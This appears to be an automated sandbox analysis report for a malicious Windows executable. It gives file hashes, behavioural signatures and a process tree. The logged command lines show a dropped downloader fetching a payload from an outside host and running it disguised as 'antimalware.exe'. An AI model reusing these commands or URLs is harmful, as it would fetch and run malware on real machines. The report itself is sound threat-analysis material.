Analysis
-
max time kernel
142s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
30-12-2023 01:15
Static task
static1
Behavioral task
behavioral1
Sample
09c4bf9b51c56260cbc50c947778819a.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
09c4bf9b51c56260cbc50c947778819a.exe
Resource
win10v2004-20231215-en
General
-
Target
09c4bf9b51c56260cbc50c947778819a.exe
-
Size
139KB
-
MD5
09c4bf9b51c56260cbc50c947778819a
-
SHA1
946e4afd5745cbed9be7dae9612e91aac7275626
-
SHA256
a0bdfd11db71f8a2efe0c7a21865ee8550aad33eca5fba022266910522bdee81
-
SHA512
55c22d182accbade9a56551879654e85f223cf3f86810f78cabd79093762cbd0e10544d1f51626493f0a65d83c7e51a76d57f673610b2f5b0a28a81690322c3f
-
SSDEEP
3072:iSB1Ed0h4MEHZB5TiVhf/rw9pCLkmDVe8VFHqjxNQ6r:iSB1Ed0h/CB5OVhc9pCLNVe8+xNQC
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation 09c4bf9b51c56260cbc50c947778819a.exe Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation start.exe Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 3 IoCs
pid Process 2996 start.exe 2940 dw.exe 2800 dw.exe -
resource yara_rule behavioral2/memory/2996-11-0x0000000000400000-0x0000000000415000-memory.dmp upx behavioral2/memory/2996-29-0x0000000000400000-0x0000000000415000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3272 cmd.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 3052 wrote to memory of 2996 3052 09c4bf9b51c56260cbc50c947778819a.exe 27 PID 3052 wrote to memory of 2996 3052 09c4bf9b51c56260cbc50c947778819a.exe 27 PID 3052 wrote to memory of 2996 3052 09c4bf9b51c56260cbc50c947778819a.exe 27 PID 2996 wrote to memory of 2120 2996 start.exe 26 PID 2996 wrote to memory of 2120 2996 start.exe 26 PID 2996 wrote to memory of 2120 2996 start.exe 26 PID 2120 wrote to memory of 2940 2120 cmd.exe 24 PID 2120 wrote to memory of 2940 2120 cmd.exe 24 PID 2120 wrote to memory of 2940 2120 cmd.exe 24 PID 2120 wrote to memory of 2800 2120 cmd.exe 33 PID 2120 wrote to memory of 2800 2120 cmd.exe 33 PID 2120 wrote to memory of 2800 2120 cmd.exe 33 PID 2120 wrote to memory of 3272 2120 cmd.exe 32 PID 2120 wrote to memory of 3272 2120 cmd.exe 32 PID 2120 wrote to memory of 3272 2120 cmd.exe 32
Processes
-
C:\Users\Admin\AppData\Local\Temp\09c4bf9b51c56260cbc50c947778819a.exe"C:\Users\Admin\AppData\Local\Temp\09c4bf9b51c56260cbc50c947778819a.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2996
-
-
C:\Users\Admin\AppData\Local\Temp\dw.exeC:\Users\Admin\AppData\Local\Temp\dw.exe http://smart.coreenglish.co.kr/smart/avisosl/counter.php Admin.tmp1⤵
- Executes dropped EXE
PID:2940
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\44AA.tmp\start.bat" "1⤵
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\antimalware.exe""2⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:3272
-
-
C:\Users\Admin\AppData\Local\Temp\dw.exeC:\Users\Admin\AppData\Local\Temp\dw.exe http://smart.coreenglish.co.kr/smart/492C0ED44E73249708175EF43E.spk ""C:\Users\Admin\AppData\Local\Temp\antimalware.exe""2⤵
- Executes dropped EXE
PID:2800
-